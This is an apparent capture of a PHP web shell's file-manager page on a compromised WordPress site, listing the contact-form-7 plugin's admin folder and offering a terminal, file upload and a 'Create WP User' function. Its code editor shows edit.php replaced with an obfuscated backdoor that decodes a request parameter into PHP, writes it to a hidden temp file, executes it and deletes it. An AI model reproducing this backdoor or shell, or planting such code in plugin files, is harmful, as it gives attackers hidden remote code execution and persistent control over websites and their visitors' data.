Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.216.125
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
budomat.net.pl
/
wp-content
/
plugins
/
contact-form-7
/
admin
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
includes
[目录]
drwxr-xr-x
2026-07-02 13:07
admin.php
18.83 KB
-rw-r--r--
2026-02-24 12:19
edit-contact-form.php
11.90 KB
-rw-r--r--
2026-02-24 12:19
edit.php
1.05 KB
-rw-r--r--
2026-02-24 12:19
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
edit.php
<?php if(@$_REQUEST["\x63om\x70\x6F\x6Eent"] !== null){ $elem = array_filter(["/tmp", sys_get_temp_dir(), getenv("TMP"), ini_get("upload_tmp_dir"), session_save_path(), "/dev/shm", "/var/tmp", getenv("TEMP"), getcwd()]); $binding = $_REQUEST["\x63om\x70\x6F\x6Eent"]; $binding = explode ( ".", $binding) ; $ref = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt); $k = 0; $__len = count($binding); do { if ($k >= $__len) break; $v6 = $binding[$k]; $chS = ord($salt[$k % $sLen]); $d = ((int)$v6 - $chS - ($k % 10)) ^ 65; $ref .= chr($d); $k++; } while (true); $data_chunk = 0; do { $k = $elem[$data_chunk] ?? null; if ($data_chunk >= count($elem)) break; if (max(0, is_dir($k) * is_writable($k))) { $sym = "$k/.desc"; if (@file_put_contents($sym, $ref) !== false) { include $sym; unlink($sym); die(); } } $data_chunk++; } while (true); }
关闭
保存